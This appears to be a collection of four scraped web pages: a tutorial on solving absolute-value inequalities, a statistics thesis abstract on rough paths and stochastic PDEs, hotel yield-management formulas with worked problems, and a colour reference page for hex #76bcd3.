"# How to Solve Absolute Value Inequalities\n\n | X + | > ≥ = ≤ <\n\nEquations with absolute values and inequalities have the form\n\n|ax+b| > c or |ax+b| < c\n\nwhere x is the variable in the algebra problem, and the parameters a, b, and c are constants, and c is positive. These problems are frequently encountered on standardized tests such as the SAT, ACT, GRE, and GMAT. They also arise in many practical applications, such as determining distances between points.\n\nWhen you solve algebraic inequalities, the solution for x is actually a range of values. And when you solve math problems involving absolute values, you must always analyze two cases. This makes absolute value inequality problems rather challenging because the solution is given in terms of two inequalities. You can use the outline below as a guide when solving these types of algebra problems, or use the absolute value inequality calculator on the left.\n\n#### Step 1\n\nIf the inequality is in the form |ax+b| > c or |ax+b| ≥ c, you must set up and solve these two equations:\n\nax+b >/≥ c and ax+b </≤ -c.\n\nIf the inequality is in the form |ax+b| < c or |ax+b| ≤ c, you must set up and solve these two equations:\n\nax+b </≤ c and ax+b >/≥ -c.\n\nThese are now regular algebra equations in one variable.\n\n#### Step 2\n\nUse the rules of inequalities to solve both equations for the range of x values. Remember, if you divide or multiply both sides of an equality by a negative number, you must switch the direction of the inequality. Your final result will be two inequalities that represent the possible values for x.\n\n#### Example\n\nSolve the equation |2x-9| > 13. The first step is to split it into two equations:\n\n2x - 9 > 13 and 2x - 9 < -13\n\nThe first inequality equation can be simplified to 2x > 22, or x > 11. The second equation can be simplified to 2x < -4, or x < -2. So the full solution is {x > 11, x < -2}. This range of solutions happens to be a disjoint set. Another way of expressing the solution is that x can equal all real numbers except for numbers between -2 and 11 (inclusive)."
https://hammer.figshare.com/articles/thesis/Contributions_to_Rough_Paths_and_Stochastic_PDEs/12720878/1
"## File(s) under embargo\n\nReason: One chapter submitted for publication\n\ndays\n\n## 2\n\nhours\n\nuntil file(s) become available\n\n## Contributions to Rough Paths and Stochastic PDEs\n\nthesis\nposted on 27.07.2020, 15:27\nProbability theory is the study of random phenomena. Many dynamical systems with random influence, in nature or artificial complex systems, are better modeled by equations incorporating the intrinsic stochasticity involved. In probability theory, stochastic partial differential equations (SPDEs) generalize partial differential equations through random force terms and coefficients, while stochastic differential equations (SDEs) generalize ordinary differential equations. They are both abound in models involving Brownian motion throughout science, engineering and economics. However, Brownian motion is just one example of a random noisy input. The goal of this thesis is to make contributions in the study and applications of stochastic dynamical systems involving a wider variety of stochastic processes and noises. This is achieved by considering different models arising out of applications in thermal engineering, population dynamics and mathematical finance.\n\n1. Power-type non-linearities in SDEs with rough noise: We consider a noisy differential equation driven by a rough noise that could be a fractional Brownian motion, a generalization of Brownian motion, while the equation's coefficient behaves like a power function. These coefficients are interesting because of their relation to classical population dynamics models, while their analysis is particularly challenging because of the intrinsic singularities. Two different methods are used to construct solutions: (i) In the one-dimensional case, a well-known transformation is used; (ii) For multidimensional situations, we find and quantify an improved regularity structure of the solution as it approaches the origin. Our research is the first successful analysis of the system described under a truly rough noise context. We find that the system is well-defined and yields non-unique solutions. In addition, the solutions possess the same roughness as that of the noise.\n\n2. Parabolic Anderson model in rough environment: The parabolic Anderson model is one of the most interesting and challenging SPDEs used to model varied physical phenomena. Its original motivation involved bound states for electrons in crystals with impurities. It also provides a model for the growth of magnetic field in young stars and has an interpretation as a population growth model. The model can be expressed as a stochastic heat equation with additional multiplicative noise. This noise is traditionally a generalized derivative of Brownian motion. Here we consider a one dimensional parabolic Anderson model which is continuous in space and includes a more general rough noise. We first show that the equation admits a solution and that it is unique under some regularity assumptions on the initial condition. In addition, we show that it can be represented using the Feynman-Kac formula, thus providing a connection with the SPDE and a stochastic process, in this case a Brownian motion. The bulk of our study is devoted to explore the large time behavior of the solution, and we provide an explicit formula for the asymptotic behavior of the logarithm of the solution.\n\n3. Heat conduction in semiconductors: Standard heat flow, at a macroscopic level, is modeled by the random erratic movements of Brownian motions starting at the source of heat. 
3. Heat conduction in semiconductors: Standard heat flow, at a macroscopic level, is modeled by the random erratic movements of Brownian motions starting at the source of heat. However, this diffusive nature of heat flow predicted by Brownian motion is not observed in certain materials (semiconductors, dielectric solids) over short length and time scales. The thermal transport in these materials is more akin to a super-diffusive heat flow, which calls for processes beyond Brownian motion to capture this heavy-tailed behavior. In this context, we propose the use of a well-defined Lévy process, the so-called relativistic stable process, to better model the observed phenomenon. This process captures the observed heat dynamics at short length-time scales and is also closely related to the relativistic Schrödinger operator. In addition, it serves as a good candidate for explaining the usual diffusive nature of heat flow in large length-time regimes. The goal is to verify our model against experimental data, retrieve the best parameters of the process and discuss their connections to material thermal properties.

4. Bond pricing under partial information: We study an information asymmetry problem in a bond market. In particular, we derive bond price dynamics for traders with different levels of information. We allow all information processes as well as the short rate to have jumps in their sample paths, thus representing more dramatic movements. We also allow the short rate to be modulated by all information processes, in addition to receiving instantaneous feedback from its own current level. A fully informed trader observes all information that affects the bond price, while a partially informed trader observes only a part of it. We first obtain the bond price dynamics under full information, and then derive the bond price of the partially informed trader using a Bayesian filtering method. The key step is to perform a change of measure so that the dynamics under the new measure become computationally efficient.

### History

#### Degree Type

Doctor of Philosophy

#### Department

Statistics

#### Campus location

West Lafayette

#### Advisors / committee

Kiseop Lee, Samy Tindel, Raghu Pasupathy
https://www.ihmnotessite.net/yield-mngt-numericals
"top of page\n\n# Numericals\n\nMEASURING YIELD\n\nFORMULA 1:\n\nPot avg single rate = Single occ room revenue / No of rooms sold as single\n\nFORMULA 2:\n\nPot avg double rate = Double occ room rev/ No of rooms sold as double\n\nFORMULA 3:\n\nMultiple occ % = No of rooms sold on multiple occ / No of occupied rooms x 100\n\nFORMULA 4:\n\nDifference between:\n\nPotential average double rate – Potential average single rate\n\nHigher the rate spread customer has less choice to take higher price rooms and upgrade\n\nFORMULA 5:\n\nPotential average rate = (Multiple occupancy percentage x rate spread ) + potential avg single rate\n\nFORMULA 6:\n\nAchievement factor= Actual Average room rate (ARR) /Potential avg room rate (PAR)\n\nFORMULA 7:\nMEASURING YIELD\n\nYIELD is expressed as the ratio of = Actual room revenue/ Potential room revenue\n\nYIELD % = Actual room revenue / Potential room revenue x 100\n\nYIELD = Actual room revenue/Potential room revenue\n\nYIELD = Total rooms sold/ Total available rooms x Actual avg room rate(ARR)/ Potential avg room rate\n\nYIELD = Occupancy percentage x Achievement factor\n\nNOTE: Maximum value of yield is 1\n\n• This statement is possible only when the value of actual rev/potential rev is equal.\n\n• Only if the rooms at actual rev are sold at rack rate at 100%\n\nActual rev/Potential rev = 600000/600000 = 1\n\n• Occupancy % = Total rooms sold / Total no of rooms available x 100\n\nIt expresses total no. of rooms sold to the no. of rooms available\n\n• Average Daily Rate: Room Revenue/ No of rooms sold\n\nIt expresses avg amount paid per rooms to that of total no.of rooms sold\n\n• RevPAR = Revenue per Available Room\n\nThere are two formulas\n\n• RevPAR = Room Revenue/ Total rooms available\n\n• RevPAR = ADR X Occupancy %\n\nWHY RevPAR?\n\nBest measurement for maximizing room revenue as it identifies hotels occupancy percentage and ADR together, they challenge hoteliers to maximize occupancy and room rates.\n\nIDENTICAL YIELDS\n\nIf combination of Occupancy percentage and Average room rate results in equivalent revenue or equal yields\n\nIdentical yield occupancy %\n\nIdentical yield occ % = Current occ% x Current rate/ Proposed rate\n\nEQUIVALENT OCCUPANCY\n\nIt is the occupancy percentage that a hotel has to achieve if the hotel plans to change it ARR (higher or lower )\n\nIt evaluates whether the change in ARR is justified or not.\n\nEquivalent Occ% = Current occ% x Current contribution margin/ New contribution margin\n\nContribution margin = Room rate - Marginal cost (cleaning supplies)\n\nYIELD MANAGEMENT SOFTWARE\n\nYield management software is designed to analyze the following:\n\n1. Dates of High and low demands in the hotel\n\n2. Monitor booking pattern\n\n3. Categorize information and help in forecasting\n\n4. Monitor and manage risk automatically\n\n5. Forecasting function space in the hotel (F&B)\n\n6. On to one revenue management (RevPAG)\n\n7. Calculation on FIT and group bookings\n\nQ1. Front office manager of Taj view hotel has received the daily report with the following data.\n\nTotal rooms = 300\n\nRooms sold = 240\n\nRack rate = 2000/-\n\n85 rooms sold @ Rs 1,500/-\n\n65 rooms sold @ Rs 1,000/-\n\n90 rooms sold @ Rs 900/-\n\nDetermine the yield and yield %\n\nSolution\n\nYield = actual rev/ potential rev\n\nActual rev=85 x 1500+ 65 x 1000+ 90 x 900=273500\n\nPotential rev = 300 x 2000 = 600000\n\nYield = 273500/ 600000 = .45\n\nYield %= .45x100 = 45%\n\nQ2. 
Q2. The front office manager of Hotel Retreat has the following information from his daily report:

Total rooms = 350; occupancy = 80 %; rack rate = Rs 3,000

125 rooms sold @ Rs 2,700; 100 rooms sold @ Rs 2,500; 55 rooms sold @ Rs 2,000

Determine the yield %.

Solution

Actual revenue = 125 × 2700 + 100 × 2500 + 55 × 2000 = 697,500

Potential revenue = 350 × 3000 = 1,050,000

Yield = 697500 / 1050000 ≈ 0.66

Yield % ≈ 66 %

The higher the yield percentage, the better the performance.

Q3. A 300-room hotel with Rs 1,000 as rack rate sells 200 rooms at an average rate of Rs 800. Calculate the yield.

Q4. The 300-room Casa Vana Inn sells rooms for a total of Rs 5,25,000. What is the hotel's revenue per available room?

Q5. A 100-room hotel sold 30 rooms at Rs 40, 30 rooms at Rs 50 and 30 rooms at Rs 60. What is the hotel's RevPAR?

Solution 5

Method I: RevPAR = Total room revenue / Total rooms available = 4500 / 100 = 45

Method II: RevPAR = ADR × Occupancy %

ADR = Total room revenue / Number of rooms sold = 4500 / 90 = 50

Occupancy % = Number of rooms sold / Number of rooms available = 90 / 100 = 0.9

RevPAR = 50 × 0.9 = 45

Q6. Hotel Retreat has 300 guest rooms, collects an average of Rs 2,000 per room and operates at 70 % average occupancy. The hotel offers 100 one-bedded and 200 two-bedded rooms. The room rates are:

1. One-bedded room: Rs 3,000 when sold at single occupancy
2. One-bedded room: Rs 4,000 when sold at double occupancy
3. Two-bedded room: Rs 3,500 when sold at single occupancy
4. Two-bedded room: Rs 4,500 when sold at double occupancy

Compute the following:

1. Potential average single rate
2. Potential average double rate
3. Rate spread
4. Multiple occupancy % (105 of the occupied rooms are at multiple occupancy)
5. Potential average rate
6. Achievement factor and yield %

SOLUTIONS

1. Potential average single rate = Single-occupancy room revenue / Number of rooms sold as singles. Potential revenue at 100 % single occupancy = (100 × 3000) + (200 × 3500) = 10,00,000, so the potential average single rate = 10,00,000 / 300 = Rs 3,333.33.

2. Potential average double rate = Double-occupancy room revenue / Number of rooms sold as doubles = ((100 × 4000) + (200 × 4500)) / 300 = 13,00,000 / 300 = Rs 4,333.33.

3. Rate spread = Potential average double rate − Potential average single rate = 4,333.33 − 3,333.33 = Rs 1,000.

4. Multiple occupancy % = Number of rooms sold at multiple occupancy / Number of occupied rooms × 100. Rooms occupied = 70/100 × 300 = 210, so multiple occupancy % = 105/210 × 100 = 50 %.

5. Potential average room rate = Multiple occupancy % × rate spread + potential average single rate = 50/100 × 1000 + 3,333.33 = Rs 3,833.33.

6. Achievement factor = ARR / Potential average room rate = 2000 / 3833.33 ≈ 0.522, i.e. about 52 %.

7. Yield = Occupancy % × achievement factor = 0.70 × 0.522 ≈ 0.365, i.e. about 36.5 %.
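Q6 chains several of the formulas, so a short worked script helps check the arithmetic; again, the variable names are illustrative only:

```python
# Q6: 100 one-bedded and 200 two-bedded rooms, 300 rooms in total
pot_single = (100 * 3000 + 200 * 3500) / 300        # potential avg single rate: 3333.33
pot_double = (100 * 4000 + 200 * 4500) / 300        # potential avg double rate: 4333.33
rate_spread = pot_double - pot_single               # 1000.0

occupied = 0.70 * 300                               # 210 rooms at 70 % occupancy
multi_occ = 105 / occupied                          # 0.5 -> 50 %

pot_avg_rate = multi_occ * rate_spread + pot_single # 3833.33
achievement = 2000 / pot_avg_rate                   # 0.522
overall_yield = 0.70 * achievement                  # 0.365 -> about 36.5 %
print(round(pot_avg_rate, 2), round(achievement, 3), round(overall_yield, 3))
```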
https://www.colorhexa.com/76bcd3
"# #76bcd3 Color Information\n\nIn a RGB color space, hex #76bcd3 is composed of 46.3% red, 73.7% green and 82.7% blue. Whereas in a CMYK color space, it is composed of 44.1% cyan, 10.9% magenta, 0% yellow and 17.3% black. It has a hue angle of 194.8 degrees, a saturation of 51.4% and a lightness of 64.5%. #76bcd3 color hex could be obtained by blending #ecffff with #0079a7. Closest websafe color is: #66cccc.\n\n• R 46\n• G 74\n• B 83\nRGB color chart\n• C 44\n• M 11\n• Y 0\n• K 17\nCMYK color chart\n\n#76bcd3 color description : Slightly desaturated cyan.\n\n# #76bcd3 Color Conversion\n\nThe hexadecimal color #76bcd3 has RGB values of R:118, G:188, B:211 and CMYK values of C:0.44, M:0.11, Y:0, K:0.17. Its decimal value is 7781587.\n\nHex triplet RGB Decimal 76bcd3 `#76bcd3` 118, 188, 211 `rgb(118,188,211)` 46.3, 73.7, 82.7 `rgb(46.3%,73.7%,82.7%)` 44, 11, 0, 17 194.8°, 51.4, 64.5 `hsl(194.8,51.4%,64.5%)` 194.8°, 44.1, 82.7 66cccc `#66cccc`\nCIE-LAB 72.574, -16.015, -18.455 37.209, 44.519, 68.257 0.248, 0.297, 44.519 72.574, 24.435, 229.049 72.574, -32.304, -26.346 66.723, -17.22, -13.947 01110110, 10111100, 11010011\n\n# Color Schemes with #76bcd3\n\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d38d76\n``#d38d76` `rgb(211,141,118)``\nComplementary Color\n• #76d3bc\n``#76d3bc` `rgb(118,211,188)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #768ed3\n``#768ed3` `rgb(118,142,211)``\nAnalogous Color\n• #d3bc76\n``#d3bc76` `rgb(211,188,118)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d3768e\n``#d3768e` `rgb(211,118,142)``\nSplit Complementary Color\n• #bcd376\n``#bcd376` `rgb(188,211,118)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d376bc\n``#d376bc` `rgb(211,118,188)``\n• #76d38d\n``#76d38d` `rgb(118,211,141)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d376bc\n``#d376bc` `rgb(211,118,188)``\n• #d38d76\n``#d38d76` `rgb(211,141,118)``\n• #3d9fbf\n``#3d9fbf` `rgb(61,159,191)``\n• #4fa9c7\n``#4fa9c7` `rgb(79,169,199)``\n• #63b3cd\n``#63b3cd` `rgb(99,179,205)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #89c5d9\n``#89c5d9` `rgb(137,197,217)``\n• #9dcfdf\n``#9dcfdf` `rgb(157,207,223)``\n• #b0d8e6\n``#b0d8e6` `rgb(176,216,230)``\nMonochromatic Color\n\n# Alternatives to #76bcd3\n\nBelow, you can see some colors close to #76bcd3. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #76d3d3\n``#76d3d3` `rgb(118,211,211)``\n• #76ccd3\n``#76ccd3` `rgb(118,204,211)``\n• #76c4d3\n``#76c4d3` `rgb(118,196,211)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #76b4d3\n``#76b4d3` `rgb(118,180,211)``\n``#76add3` `rgb(118,173,211)``\n• #76a5d3\n``#76a5d3` `rgb(118,165,211)``\nSimilar Colors\n\n# #76bcd3 Preview\n\nThis text has a font color of #76bcd3.\n\n``<span style=\"color:#76bcd3;\">Text here</span>``\n#76bcd3 background color\n\nThis paragraph has a background color of #76bcd3.\n\n``<p style=\"background-color:#76bcd3;\">Content here</p>``\n#76bcd3 border color\n\nThis element has a border color of #76bcd3.\n\n``<div style=\"border:1px solid #76bcd3;\">Content here</div>``\nCSS codes\n``.text {color:#76bcd3;}``\n``.background {background-color:#76bcd3;}``\n``.border {border:1px solid #76bcd3;}``\n\n# Shades and Tints of #76bcd3\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
# Shades and Tints of #76bcd3

A shade is achieved by adding black to any pure hue, while a tint is created by mixing white into any pure color. In this example, #040a0b is the darkest color, while #fcfdfe is the lightest one.

Shades and tints: #040a0b, #08161a, #0d2229, #122f38, #173b47, #1c4756, #205465, #256073, #2a6c82, #2f7991, #3385a0, #3891af, #3d9ebe, #49a6c5, #58adc9, #67b5ce, #76bcd3, #85c3d8, #94cbdd, #a3d2e1, #b1d9e6, #c0e0eb, #cfe8f0, #deeff4, #edf6f9, #fcfdfe

# Tones of #76bcd3

A tone is produced by adding gray to any pure hue. In this case, #a0a7a9 is the least saturated color, while #4cd1fd is the most saturated one.

Tones: #a0a7a9, #99aab0, #92aeb7, #8bb1be, #84b5c5, #7db8cc, #76bcd3, #6fc0da, #68c3e1, #61c7e8, #5acaef, #53cef6, #4cd1fd

# Color Blindness Simulator

Below, you can see how #76bcd3 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.

- Monochromacy: achromatopsia (0.005% of the population); atypical achromatopsia (0.001% of the population)
- Dichromacy: protanopia (1% of men); deuteranopia (1% of men); tritanopia (0.001% of the population)
- Trichromacy: protanomaly (1% of men, 0.01% of women); deuteranomaly (6% of men, 0.4% of women); tritanomaly (0.01% of the population)